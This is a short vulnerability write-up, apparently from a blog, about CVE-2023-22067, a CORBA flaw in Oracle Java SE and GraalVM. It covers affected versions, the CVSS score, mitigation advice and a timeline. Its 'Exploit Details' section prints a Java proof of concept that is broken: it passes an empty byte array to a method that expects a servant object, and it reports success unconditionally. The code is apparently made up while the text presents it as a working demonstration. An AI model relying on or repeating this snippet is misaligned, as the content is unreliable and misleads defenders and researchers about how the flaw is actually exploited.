CVE-2023-22067 - Vulnerability in Oracle Java SE and Oracle GraalVM Enterprise Edition Allows Unauthorized Data Access

A new vulnerability (CVE-2023-22067) has been discovered in the Oracle Java SE and Oracle GraalVM Enterprise Edition products, specifically in the CORBA (Common Object Request Broker Architecture) component. Unauthenticated attackers with network access via CORBA can exploit this vulnerability to gain unauthorized update, insert, or delete access to some of the accessible data in Oracle Java SE and Oracle GraalVM Enterprise Edition without using Untrusted Java Web Start applications or Untrusted Java applets. The vulnerability affects Oracle Java SE versions 8u381, 8u381-perf; Oracle GraalVM Enterprise Edition versions 20.3.11, and 21.3.7. This vulnerability has a CVSS 3.1 Base Score of 5.3, with a vector:(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).

Exploit Details

To exploit this vulnerability, an attacker only needs to supply data to APIs within the affected component without the use of Untrusted Java Web Start applications or Untrusted Java applets. This can be done by sending a specially crafted request via a web service. The simplicity of the attack makes the vulnerability easy to exploit.

The following code snippet demonstrates how an attacker might exploit the vulnerability

import org.omg.CORBA.ORB;
import org.omg.PortableServer.POA;
import java.util.Properties;

public class ExploitCVE202322067 {
    public static void main(String[] args) {
        try {
            Properties props = new Properties();
            props.put("org.omg.CORBA.ORBInitialPort", "12345");
            props.put("org.omg.CORBA.ORBInitialHost", "targethost");

            ORB orb = ORB.init(args, props);
            POA rootPOA = (POA) orb.resolve_initial_references("RootPOA");

            // Craft a malicious request to exploit the vulnerability
            byte[] payload = new byte[] {  /* ... */  };

            // Send the malicious request
            rootPOA.servant_to_reference(payload);

            System.out.println("Exploit CVE-2023-22067 successful.");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Original References

1. Oracle Security Alert Advisory - CVE-2023-22067: https://www.oracle.com/security-alerts/alert-cve-2023-22067.html
2. National Vulnerability Database (NVD) - CVE-2023-22067: https://nvd.nist.gov/vuln/detail/CVE-2023-22067

Mitigation and Recommendations

Oracle has released patches for the affected versions to address this vulnerability. Users are advised to update their Oracle Java SE and Oracle GraalVM Enterprise Edition installations immediately to protect themselves from potential exploitation. In addition, it is essential to follow best practices for secure coding and deployment of CORBA applications, such as validating user input, implementing proper access controls, and employing strong encryption for communication.

Conclusion

CVE-2023-22067 is a notable vulnerability in Oracle Java SE and Oracle GraalVM Enterprise Edition, as it allows unauthorized data access. Organizations and developers must ensure that they update their installations and follow secure practices to mitigate the risks associated with this vulnerability.

Timeline

Published on: 10/17/2023 22:15:12 UTC
Last modified on: 11/08/2023 05:15:08 UTC